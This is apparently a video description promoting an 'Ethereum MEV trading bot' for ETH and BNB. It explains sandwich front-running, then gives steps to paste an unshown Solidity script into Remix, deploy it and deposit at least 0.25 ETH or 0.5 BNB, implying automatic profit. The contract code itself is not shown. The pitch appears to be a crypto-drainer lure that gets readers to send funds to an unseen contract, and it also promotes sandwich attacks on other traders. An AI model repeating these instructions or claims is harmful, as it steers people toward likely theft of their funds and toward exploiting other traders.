Ethereum Mev Trading Bot 2024 Works with BNB!

Описание к видео Ethereum Mev Trading Bot 2024 Works with BNB!

If you're into cryptocurrency, you need to know what an MEV Bot or FrontRun Bot is. A Maximal Extractable Value (MEV) bot is an arbitrage tool that sniffs the Mempool for pending transactions on decentralized exchanges such as Uniswap and PancakeSwap. It inserts our own TX with a slightly higher gas fee, 1 Gwei higher than the TX which is trying to be entered, essentially sandwiching the pending TX and forcing ours to automatically be processed first, profiting off of the slippage differences.

Information: This script is compatible with both ETH & BNB. Skip step 2 unless you are using BNB. Step 2 is only to launch the contract on the Binance network.

STEP BY STEP Instructions :

1. Download MetaMask:

2. Configure MetaMask and Add Binance Network:
[You can Skip this step if using Ethereum]

3. Access the Remix IDE:

4. Right click on the 'contracts' folder and create a new file. Rename it as you like—i.e., 'Bot.sol'

5. Copy & Paste this script in Remix:

6. Move to the 'Solidity Compiler' tab, select version '0.6.6' and then click 'Compile'

7. Move to the 'Deploy' tab, select 'Injected Provider' as the environment, then click 'Deploy'. After the transaction is confirmed, it's your own BOT now

8. Deposit funds to cover fees (at least 0.25ETH/0.5BNB to prevent negating slippage)

9. Deposit funds to cover Mev sandwich attack

10. After your transaction is confirmed, start the bot by clicking the 'start' button. Withdraw anytime by clicking 'withdrawal'

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#bnb #binance #ftx #blockfi #usdt #eth #ethereum #avax #matic #metaverse #pancakeswap #radiocaca #raca #bnb #eth #ico #flashloanattack #flashloanarbitrage #earnbnb #freebnb #flash #loan #arbitrage #tutorial #code #uniswap #hack #news #crash #cash #metamask #trustwallet


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